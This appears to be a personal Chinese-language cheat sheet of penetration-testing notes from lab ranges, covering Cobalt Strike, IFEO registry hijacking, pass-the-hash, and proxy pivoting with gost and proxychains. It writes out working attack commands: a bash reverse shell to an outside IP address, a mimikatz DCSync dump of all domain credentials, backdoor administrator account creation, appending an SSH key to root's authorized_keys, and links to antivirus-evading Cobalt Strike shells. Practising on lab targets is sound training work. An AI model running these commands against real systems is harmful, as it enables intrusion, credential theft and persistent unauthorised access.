- 春秋云境——Tsclient
- 思考flag2中除了传cs马进程注入,有无其他方式(RDP?)
- cs常见命令用法
- 修改注册表映像劫持有哪些利用方式
- 哈希传递登录的不同方式(不同工具的区别、利用前提,不同操作系统如何哈希传递)
- mimikatz+sharptoken/msf
另外应该cs注入svchost守护进程,才会自启动cs shell,其他进程注入后不会自启动
- Cs 有。。命令吗(°ー°〃)暂时先只记shell connect,用到哪些再加
4.劫持改为粘滞键,notepad,calc等触发cmd
默认是只有管理员和local system有权读写修改。
IFEO实际上是Windows的一项正常功能,主要用于调试程序,其初衷是在程序启动的时候开启调试器来调试程序,这样一来可以在调试器中观察程序在难以重现的环境中的行为。例如,某个程序在随用户登录自动启动时会出错,但在登录后手动启动时却一切正常,这就可以通过IFEO设置一个调试器,无论程序何时启动,都会开启这个调试器对其进行调试,以便找出问题。
win+R输入regedit以管理员身份运行打开注册表编辑器,并找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options就是保存IFEO设置的地方
5.impacket的smbexec/wmiexec,crackmapexec,msf的exploit/windows/smb/psexec
额外看了cs不出网横向
话说cs能直接配置代理转发,不用上gost了
不出网正向连接需要用beacon TCP listener,然后生成的exe上线后在1的shell里用connect去连接
1 | connect 10.10.10.2 2222 |
java代审sink插件https://github.com/SpringKill-team/CodeAuditAssistant
打开是空白的话需要授权,授权完需要重启idea
其他的问题
cs server挂在vps,记得vps开放50050端口
cs用这个shell免杀比较新https://github.com/D13Xian/CobaltStrike-KunKun
因为要jdk>=11,用这个切环境变量很爽https://github.com/zhangqi-ulua/JavaEnvironmentVariablesManager/releases/tag/1.0
打靶快捷
vps 117.72.74.197
花生壳 115.236.153.174
bash -i >& /dev/tcp/115.236.153.170/28998 0>&1
mimikatz dump密码:mimikatz.exe “lsadump::dcsync /domain:xiaorang.lab /all /csv” exit
bloodhound自己的zip有自己的SharpHound,最后连续收集两次拖进去(信息全一点
本地adminstrators 用SharpHound抓不到,nt system才能抓到,可以甜土豆提权提到system
gost 代理
gost -L socks5://:5555?bind=true
gost -L rtcp://:2222/172.22.13.28:22 -F socks5://172.22.13.28:5555
windows添加管理员用户
net user godown qwerQ!1234 /add
net localgroup administrators godown /add
(work win qwerq!1234)
python转交互式shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
写ssh目录
1 | echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAyMKDIbTdKecWjhOxfm/C6bkR8WuABeqUAacyD8DJGfA7UaKQbvIZxagSrQ7X+jOPJYDwoe3HKoG0uH987EmsHMS1FLYgHIrGzinvta4AlMFCS3r8OF/49iGvcZnqxD5UNd9DRBlu4jIu6FDl+lYyebFDfjCoRn2hcin8oxXNLbo1X95B6xqaokrnFz9H57GzrqfwN6lVy46ophmtmcLqlIIMByt2wxEdaVFWrxHYVNmvMUfHOg9KJ+aqKmPIbLLSSknAeW7YOB1o86wq36vUv5nYQqol1mAlCtYYSJrNd2RRN43ikRqbQb4l5h1S1GJmYQ8hMJWhlia19waYGiSutKBjpVggEKS00Btku5xwStOraCOJqDiSNTQw//XjL/0oCeZtsrCLmPblgeLg1i7QBrTif3jQ+3UNC1DWj7+NXdmaEAeLWH1vVu7K0JzN3yMKM9ywoZQClGVv6F+aHS5HwxjKdCQPy86eG+rSmOy+RgpYjX4leqg3sb2a4Ys9oNt7/bQChABxnGfi8l48Su+nQhW1orks9sdZM9qhem90fkpqFDxt1pv6Q8J8C+8kIjXg/FmZ4qp8+d8InDqhhNbDLdAkQX1o9Iocg2XHSAtDNUHUZtNCT2AcmAH61qGkOHAe6dvXEVA9HRxF5oElnyAQ87z4Hbo2wW7CCPBbXNkjQIk= rsa 4096-20250810" >> /root/.ssh/authorized_keys |
proxychains4
sudo vi /etc/proxychains4.conf
socks5 192.168.1.100 1080
clash开TUN代理上google很丝滑
vim清空::%d
windows nc 要用 nc64 -lvp 19998
其他记录
云镜自动签到脚本,token储存在本地浏览器(什么cookie hh?),只要在浏览器不点退出登录,token就能一直使用,写个计划任务每天上午下午签到顺便刷新token的有效期
1 |
|
msf笔记
先Nmap或者arp-scan扫端口,根据端口攻击。如果开了web端口,就想办法rce反弹shell。拿到shell后扫一下内网,目前只会ping扫,或者升msf,用msf的scan exp扫。然后在靶机上download venom客户端用以代理,在攻击机起服务端,socks通道打通后,更改proxychains4.conf(配置文件,名字可能不一样),实现攻击机的全局代理,然后带上Proxychains nmap扫内网靶机端口
如果靶机打着无回显了,应该是靶机命令还没执行完,比如ping扫内网,命令还没执行完,在shell退了sessions,或者单纯的用ctrl+c,在靶机上命令是还会继续执行的,就导致了后续命令执行不了。这种情况再杀掉session重新打时,之前在靶机上的shell还在,就会发生如下情况:
1
2 [-] Command shell session 3 is not valid and will be closed
[*] 192.168.137.129 - Command shell session 3 closed.可以把靶机重启,但是要重复许多步骤,最好不要杀掉sessions,进入之前没执行完命令的sessions,然后发送远程ctrl+c